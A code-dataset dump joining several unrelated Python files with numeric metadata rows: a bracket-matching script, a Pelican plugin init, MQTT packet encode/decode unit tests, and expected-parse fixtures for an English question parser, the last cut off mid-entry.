| 27.584906 | 67 | 0.530096 | 184 | 1,462 | 4.163043 | 0.201087 | 0.031332 | 0.046997 | 0.086162 | 0.875979 | 0.875979 | 0.875979 | 0.836815 | 0.836815 | 0.836815 | 0 | 0.013233 | 0.276334 | 1,462 | 52 | 68 | 28.115385 | 0.710775 | 0 | 0 | 0.804878 | 0 | 0 | 0.164159 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.02439 | 0 | 0.097561 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09bd82df408552bd1587b6d12b3541580ad6125e | 739 | py | Python | STACK/check_Parenthesis using Stack.py | rajansh87/Algorithms-Implementations | 1f3dd1bc2decf10638fe0fdeeede47a650a9057b | [
"MIT"
] | 1 | 2020-05-10T19:01:51.000Z | 2020-05-10T19:01:51.000Z | STACK/check_Parenthesis using Stack.py | rajansh87/Algorithms-Implementations | 1f3dd1bc2decf10638fe0fdeeede47a650a9057b | [
"MIT"
] | 9 | 2021-03-17T18:10:18.000Z | 2021-03-29T19:35:06.000Z | STACK/check_Parenthesis using Stack.py | rajansh87/Data-Structures-and-Algorithms-Implementations | 0529079fbcd4d1a047210e9f2ff42c194c0818fe | [
"MIT"
] | null | null | null | s=")}}}(}]}(}}(}[]])](}"
stack=[]
for i in s:
if i=="[" or i=="(" or i=="{":
stack.append(i)
elif i=="]":
if len(stack)!=0:
if stack[-1]=="[":
stack.pop()
else:
print(0)
else:
print(0)
elif i==")":
if len(stack)!=0:
if stack[-1]=="(":
stack.pop()
else:
print(0)
else:
print(0)
elif i=="}":
if len(stack)!=0:
if stack[-1]=="{":
stack.pop()
else:
print(0)
else:
print(0)
if(len(stack)==0):
print(1)
else:
print(0)
| 21.114286 | 35 | 0.29364 | 75 | 739 | 2.893333 | 0.2 | 0.290323 | 0.322581 | 0.202765 | 0.718894 | 0.718894 | 0.718894 | 0.718894 | 0.718894 | 0.718894 | 0 | 0.041436 | 0.510149 | 739 | 34 | 36 | 21.735294 | 0.558011 | 0 | 0 | 0.606061 | 0 | 0 | 0.041135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.242424 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
61dc56be89bcefd71aaffb502a65fabd588bed11 | 136 | py | Python | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | null | null | null | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | 5 | 2020-11-20T17:46:05.000Z | 2022-02-11T18:07:52.000Z | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | 1 | 2021-08-19T02:10:05.000Z | 2021-08-19T02:10:05.000Z | from pelican import signals
from .generators import get_generators
def register():
signals.get_generators.connect(get_generators)
| 19.428571 | 50 | 0.816176 | 17 | 136 | 6.352941 | 0.529412 | 0.361111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 136 | 6 | 51 | 22.666667 | 0.907563 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
11394298dd5fa548740ab12c17c120f24f7d99b3 | 20,218 | py | Python | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 34 | 2015-10-03T20:08:19.000Z | 2022-01-31T23:51:02.000Z | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 16 | 2016-04-23T18:46:42.000Z | 2020-08-24T07:33:01.000Z | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 15 | 2015-12-12T03:35:55.000Z | 2021-07-08T05:39:19.000Z | # ----------------------------------------------------------------------
# Copyright (C) 2015 by Rafael Gonzalez
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ----------------------------------------------------------------------
from twisted.trial import unittest
from twisted.test import proto_helpers
from mqtt import v31, v311
from mqtt.pdu import (
CONNECT,
CONNACK,
DISCONNECT,
PINGREQ,
PINGRES,
SUBSCRIBE,
SUBACK,
UNSUBSCRIBE,
UNSUBACK,
PUBLISH,
PUBACK,
PUBREC,
PUBREL,
PUBCOMP,
)
class PDUTestCase(unittest.TestCase):
def test_CONNECT_encdec(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.version = v31
request.keepalive = 0
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_keepalive(self):
request = CONNECT()
response = CONNECT()
request.version = v31
request.clientId = "client-foo"
request.keepalive = 12
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
self.assertEqual(request.version, response.version)
def test_CONNECT_encdec_willTopic(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willMessage(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willRetain(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = True
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_userpass(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 12000
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = "foouser"
request.password = "foopasswd"
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password.decode(encoding='ascii', errors='ignore'))
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_session(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1200
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = False
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_version(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 120
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v311
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_PINGREQ_encdec(self):
request = PINGREQ()
response = PINGREQ()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_PINGRES_encdec(self):
request = PINGRES()
response = PINGRES()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_DISCONNECT_encdec(self):
request = DISCONNECT()
response = DISCONNECT()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_CONNACK_encdec(self):
request = CONNACK()
response = CONNACK()
request.session = True
request.resultCode = 2
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.session, response.session)
self.assertEqual(request.resultCode, response.resultCode)
def test_SUBSCRIBE_encdec(self):
request = SUBSCRIBE()
response = SUBSCRIBE()
request.topics = [('foo', 1), ('bar',0), ('baz',2)]
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_SUBACK_encdec(self):
request = SUBACK()
response = SUBACK()
request.msgId = 5
request.granted = [(0, False), (0, True), (1,False), (1,True), (2,False), (2,True)]
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.granted, response.granted)
def test_UNSUBSCRIBE_encdec(self):
request = UNSUBSCRIBE()
response = UNSUBSCRIBE()
request.topics = ['foo', 'bar', 'baz']
request.msgId = 6
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_UNSUBACK_encdec(self):
request = UNSUBACK()
response = UNSUBACK()
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBACK_encdec(self):
request = PUBACK()
response = PUBACK()
request.msgId = 65535
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREC_encdec(self):
request = PUBREC()
response = PUBREC()
request.msgId = 30001
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREL_encdec(self):
request = PUBREL()
response = PUBREL()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBCOMP_encdec(self):
request = PUBCOMP()
response = PUBCOMP()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBLISH_encdec(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = None
request.qos = 0
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_qos(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_dup(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = True
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_retain(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_str(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = ""
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_bytearray(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = bytearray(5)
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload)
class PDUTestCase2(unittest.TestCase):
def test_PUBREC_enc_fail1(self):
request = PUBACK()
response = PUBACK()
request.msgId = -1
self.assertRaises(ValueError, request.encode)
def test_PUBREC_enc_fail2(self):
request = PUBACK()
response = PUBACK()
request.msgId = 2000000
self.assertRaises(ValueError, request.encode)
def test_PUBLISH_encdec_payload_int(self):
request = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 65537
self.assertRaises(TypeError, request.encode)
def test_PUBLISH_encdec_payload_float(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 12.25
self.assertRaises(TypeError, request.encode)
| 39.488281 | 106 | 0.6376 | 1,984 | 20,218 | 6.456653 | 0.098286 | 0.166276 | 0.243872 | 0.054801 | 0.819672 | 0.814754 | 0.805074 | 0.779625 | 0.779313 | 0.779313 | 0 | 0.011854 | 0.26145 | 20,218 | 511 | 107 | 39.565558 | 0.846035 | 0.059501 | 0 | 0.755294 | 0 | 0 | 0.013795 | 0 | 0 | 0 | 0 | 0 | 0.343529 | 1 | 0.070588 | false | 0.04 | 0.009412 | 0 | 0.084706 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
115318f3e66a42adfeefcf8f834d053f816d89ab | 18,759 | py | Python | src/ro/webdata/oniq/test/dataset/dataset_00.py | iliedorobat/semIQ | 20ca0f418a673bd965f8f56e94c8311a727b7a29 | [
"MIT"
] | 1 | 2022-03-20T17:02:00.000Z | 2022-03-20T17:02:00.000Z | src/ro/webdata/oniq/test/dataset/dataset_00.py | iliedorobat/semIQ | 20ca0f418a673bd965f8f56e94c8311a727b7a29 | [
"MIT"
] | null | null | null | src/ro/webdata/oniq/test/dataset/dataset_00.py | iliedorobat/semIQ | 20ca0f418a673bd965f8f56e94c8311a727b7a29 | [
"MIT"
] | null | null | null | WHAT_PAIRS = [
{
"query": "What museums and swords are in Bacau?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## what swords,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "What museums are in Bacau or Bucharest?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Bucharest
}
"""
},
{
"query": "What museums are in Bacau, Iasi or Bucharest?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Iasi
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Bucharest
}
"""
}
]
WHAT_IS_PAIRS = [
{
"query": "What is the most beautiful museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful museum
}
"""
},
{
"query": "What is the name of the largest museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the largest museum
}
"""
},
{
"query": "What is the name of the most beautiful museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the most beautiful museum
}
"""
},
{
"query": "What is the name of the largest museum which hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the largest museum
}
statement: {
target phrase: of the largest museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: of the largest museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
},
{
"query": "What is the most beautiful place and the largest cave?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful place
}
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the largest cave
}
"""
}
]
WHICH_PAIRS = [
{
"query": "Which smart kid is famous?",
"result": """
statement: {
target phrase: which smart kid,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [famous]
},
related phrase: famous
}
"""
},
{
"query": "Which of the smart kids are famous?",
"result": """
statement: {
target phrase: which of the smart kids,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: [famous]
},
related phrase: famous
}
"""
},
{
"query": "Which paintings located in Bacau are in good shape?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in good shape
}
"""
},
{
"query": "Which paintings, swords or statues are in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##or## which swords,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##or## which statues,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which museum hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: which museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: which museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
},
{
"query": "Which painting has not been deposited in Bacau?",
"result": """
statement: {
target phrase: which painting,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which paintings and statues have not been deposited in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which statues,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which paintings, sharp swords and tall statues have not been deposited in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which sharp swords,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which tall statues,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which of the most beautiful paintings has not been moved to Bacau?",
"result": """
statement: {
target phrase: which of the most beautiful paintings,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: moved,
modal_vb: None
},
acomp_list: []
},
related phrase: to Bacau
}
"""
},
{
"query": "Which one of the most beautiful paintings has not been moved to Bacau?",
"result": """
statement: {
target phrase: which one of the most beautiful paintings,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: moved,
modal_vb: None
},
acomp_list: []
},
related phrase: to Bacau
}
"""
},
{
"query": "Which paintings do not have more than three owners?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
"""
},
{
"query": "Which painting, sharp swords or statues do not have more than three owners?",
"result": """
statement: {
target phrase: which painting,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
statement: {
target phrase: ##or## which sharp swords,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
statement: {
target phrase: ##or## which statues,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
"""
}
]
WHICH_IS_PAIRS = [
{
"query": "Which is the noisiest and the largest city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the largest city
}
"""
},
{
"query": "Which is the noisiest and the most beautiful city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the most beautiful city
}
"""
},
{
# TODO: the most beautiful
"query": "Which is the noisiest, the most beautiful and the largest city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, noisiest]
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, noisiest]
},
related phrase: ##and## the largest city
}
"""
},
{
# FIXME: "the largest", "the most crowded city"
"query": "Which is the noisiest, the largest and the most crowded city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
"""
},
{
"query": "Which is the museum which hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
